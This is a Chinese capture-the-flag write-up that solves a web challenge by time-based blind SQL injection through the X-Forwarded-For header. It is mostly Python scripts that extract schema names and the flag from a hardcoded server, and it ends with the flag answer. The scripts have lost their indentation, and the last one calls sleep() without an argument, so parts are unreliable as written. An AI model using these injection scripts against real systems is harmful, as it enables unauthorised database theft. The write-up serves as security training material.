1、web15
这道题的题目已经将源代码给我们了
可以看出这是time-based盲注
点开链接,我们看到
想到可以尝试各种IP的HTTP头:
X-Forwarded-For
Client-IP
x-remote-IP
x-originating-IP
x-remote-addr
发现X-Forwarded-For可以伪造
发现注入的语句原封不动的显示在页面中,但如果注入的语句中有逗号,则逗号后面的内容就不会显示在页面中
逗号后面的内容被截掉了
然后就可以写一个脚本爆破得到库名,表名和字段名了
首先我们来找一下数据库名
# -*- coding:utf-8 -*-
import requests
import string
url = "http://120.24.86.145:8002/web15/"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
database=[]
for database_number in range(0,100): #假设爆破前100个库
databasename=''
for i in range(1,100): #爆破字符串长度,假设不超过100长度
flag=0
for str in guess: #爆破该位置的字符
#print 'trying ',str
headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
databasename+=str
flag=1
print('正在扫描第%d个数据库名,the databasename now is '%(database_number+1) ,databasename)
break
if flag==0:
break
database.append(databasename)
if i==1 and flag==0:
print('扫描完成')
break
for i in range(len(database)):
print(database[i])
找到的数据库为
这里有两个数据库,我们先尝试information_schema这个数据库
用脚本跑一下有多少列
# -*- coding:utf-8 -*-
import requests
import string
url = "http://120.24.86.145:8002/web15/"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
database=[]
for table_number in range(0,500):
print('trying',table_number)
headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
print(table_number)
break
一共42列,一般猜测在最后,前面应该都是information_schema里的那些
尝试一下
# -*- coding:utf-8 -*-
import requests
import string
url = "http://120.24.86.145:8002/web15/"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
tables=[]
![TIM截图20180202153421.png](http://upload-images.jianshu.io/upload_images/9168776-0183444b8a11751c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
for table_number in range(41,42): #假设从第60个开始
tablename=''
for i in range(1,100): #爆破字符串长度,假设不超过100长度
flag=0
for str in guess: #爆破该位置的字符
headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
tablename+=str
flag=1
print('正在扫描第%d个数据库名,the tablename now is '%(table_number+1) ,tablename)
break
if flag==0:
break
tables.append(tablename)
if i==1 and flag==0:
print('扫描完成')
break
for i in range(len(tables)):
print(tables[i])
找到了flag表
接下来求列名
再跑一下有多少列
# -*- coding:utf-8 -*-
import requests
import string
url = "http://120.24.86.145:8002/web15/"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
database=[]
for table_number in range(0,1000):
print('trying',table_number)
headers = {"X-forwarded-for":"'+"+" (select case when (select count(COLUMN_name) from information_schema.COLUMNS ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
print(table_number)
break
一共483列
老思路,直接暴力最后一个
# -*- coding:utf-8 -*-
import requests
import string
url = "http://120.24.86.145:8002/web15/"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
columns=[]
for column_number in range(482,483): #假设从第60个开始
cloumnname=''
for i in range(1,100): #爆破字符串长度,假设不超过100长度
flag=0
for str in guess: #爆破该位置的字符
#print 'trying',str
headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
cloumnname+=str
flag=1
print('正在扫描第%d个列名,the cloumnname now is '%(column_number+1) ,cloumnname)
break
if flag==0:
break
columns.append(cloumnname)
if i==1 and flag==0:
print('扫描完成')
break
for i in range(len(columns)):
print(columns[i])
然后直接暴力找flag就行了
import requests
import string
words = string.ascii_lowercase + string.ascii_uppercase + string.digits
url = 'http://120.24.86.145:8002/web15/'
answer=''
for length in range(1,100):
flag=0
for key in words:
data = "'+(select case when (substring((select flag from flag) from {0} for 1)='{1}') then sleep() else 1 end) and '1'='1".format(length,str(key))
headers={
"X-FORWARDED-FOR": data
}
try:
res=requests.get(url,headers=headers,timeout=5)
except Exception as e:
answer+=key
print(answer)
flag=1
break
if flag==0 and answer!= '':
break;
print(answer)
flag{cdbf14c9551d5be5612f7bb5d2867853}